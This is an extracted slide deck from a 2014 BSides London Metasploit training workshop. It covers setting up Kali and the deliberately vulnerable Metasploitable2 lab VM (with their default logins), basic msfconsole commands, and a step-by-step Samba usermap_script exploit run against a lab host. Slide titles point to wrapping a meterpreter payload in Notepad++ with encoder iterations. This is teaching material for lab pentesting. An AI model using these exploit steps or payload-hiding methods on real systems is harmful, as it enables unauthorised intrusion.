![Page 1: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/1.jpg)
Metasploit: You can look like Hugh Jackman too!
BSides London 2014
BSides London 2014
![Page 2: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/2.jpg)
Subjects
• What is the Metasploit Framework (MSF)?
• How can I use MSF to my advantage?
• Why would I want to use MSF?
• Last but not least: How DO I actually use MSF?
![Page 3: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/3.jpg)
Terminology
• MSF
• Vulnerabilities
• Exploits
• Payloads
![Page 4: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/4.jpg)
Metasploit trough the ages
• Started out as a ncruses based network game written in Perl
• 2003: MSF 1.0 released (11 exploits)
• Somewhere along the way.. v3.0 written in Ruby
• 2014: MSF 4.9 (1292 exploits)
![Page 5: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/5.jpg)
Inside the box• +1200 exploits
• 700 auxiliary modules
• +200 post modules
• +300 payloads
• +30 encoders
• 8 nops
![Page 6: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/6.jpg)
Sounds AMAZING Mike! How do I get it?
• rapid7.com
• github.com/rapid7
• kali.org
![Page 7: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/7.jpg)
And now for something completely different…
![Page 8: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/8.jpg)
Running the Metasploit Framework
From Kali Linux
![Page 9: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/9.jpg)
binary.hybrid3.iso• md5: 058226e666c98e9e094318247ddb5e2c
• sha1: 40ebcbe6487d567f55747a219b426b4e62b4995c
• 32-bits
• Kali 1.0.6
• Metasploit 4.9.2-2014042301
• root/toor
![Page 10: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/10.jpg)
metasploitable-linux-2.0.0.zip
• md5: 058226e666c98e9e094318247ddb5e2c
• sha1: 8825f2509a9b9a58ec66bd65ef83167f
• msfadmin/msfadmin
![Page 11: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/11.jpg)
Virtualbox Configuration
![Page 12: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/12.jpg)
Interacting with MSF• # msfcli
• # msfconsole
!
• out-of-scope: msfweb/msfgui
• out-of-scope: Armitage
• out-of-scope: Cobalt Strike
![Page 13: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/13.jpg)
Starting MSF from Kali
![Page 14: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/14.jpg)
msfconsole 101
• msf > version
• msf > banner
• msf > db_status
• msf > help (!!)
![Page 15: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/15.jpg)
msfconsole basics• msf > search -h
• msf > info searchresult
• msf > use searchresult
• msf auxiliary(searchresult) > show actions
• msf exploit(searchresult) > show options
• msf auxiliary(totallynotwhereIwanttobe) > back
![Page 16: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/16.jpg)
<3
![Page 17: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/17.jpg)
And now.. for something completely different!
• Open Source Security Testing Methodology Manual (OSSTM)
• Information Systems Security Assessment Framework (ISSAF)
• Penetration Testing Execution Standard (PTES)
• Open Web Application Security Project (OWASP top 10)
• SANS (20 Critical Controls)
![Page 18: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/18.jpg)
Penetration Testing stages• Information gathering
• Identifying threats
• Identifying vulnerabilities
• Exploiting vulnerabilities
• Post exploitation
![Page 19: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/19.jpg)
Let’s get to it..
![Page 20: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/20.jpg)
msfconsole 102
• msf > info exploit/multi/handler
• msf > use exploit/multi/handler
• msf exploit(handler) > info
• msf exploit(handler) > show options
• msf exploit(handler) > set variable
![Page 21: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/21.jpg)
msfconsole 10..3?
• variables are set with set
• variables can be removed with unset
• global variables can be set with setg
• variabelen can be saved to ~/.msf4/config with save
![Page 22: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/22.jpg)
MSF Jobs & Sessions
• Exploits = jobs
• Payloads = sessions
• msf > help sessions
![Page 23: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/23.jpg)
MSF Jobs & Sessions
• use back to navigate back to the framework
• use background to suspend a meterpreter session
• msf > jobs -l (list all currently active jobs)
• msf > jobs -i x (interact with job nr. x)
![Page 24: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/24.jpg)
Attack Vectors
• Server-side
• Client-side
![Page 25: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/25.jpg)
Server-side
• msf > db_nmap target-ip
• msf > hosts
• msf > services
![Page 26: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/26.jpg)
metasploitable2• msf > info exploit/multi/samba/usermap_script
• msf > use exploit/multi/samba/usermap_script
• exploit (usermap_script) > show options
• exploit (usermap_script) > set RHOST 172.x.x.x
• exploit (usermap_script) > set RPORT 445
• exploit (usermap_script) > check (niet alle exploits ondersteunen deze functie)
• exploit (usermap_script) > exploit
![Page 27: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/27.jpg)
Metasploitable2
![Page 28: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/28.jpg)
Ok, great! What now?
• msf > search post/linux
![Page 29: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/29.jpg)
msfpayload
![Page 30: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/30.jpg)
msfpayload
![Page 31: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/31.jpg)
Why?
![Page 32: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/32.jpg)
notepad++ + meterpreter
![Page 33: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/33.jpg)
notepad++ + meterpreter + 99 iterations
![Page 34: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/34.jpg)
notepad++ + meterpreter + 999 iterations
![Page 35: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/35.jpg)
VB… what?!
![Page 36: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/36.jpg)
pwnage
![Page 37: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/37.jpg)
Notepad++ + meterpreter + VBS
![Page 38: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/38.jpg)
Recap
• What is the Metasploit Framework (MSF)?
• How can I use MSF to my advantage?
• Why would I want to use MSF?
![Page 39: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/39.jpg)
Victory Dance
![Page 40: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/40.jpg)
Questions?
![Page 41: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/41.jpg)
Ok, not bad.. How can I continue?!• http://blog.ctf365.com/metasploitable-in-the-cloud/
• http://r-7.co/Metasploitable2
• http://vulnhub.com
• Be aware of browser exploits!
• Be aware of QR codes!!
• Be aware of ALL THE THINGS!!!
![Page 42: Security BSides London 2014 - Metasploit Workshop: You can look like Hugh Jackman too!](https://reader034.vdocuments.net/reader034/viewer/2022051609/546e9c2bb4af9fb9268b4714/html5/thumbnails/42.jpg)
Thank you all and until next year!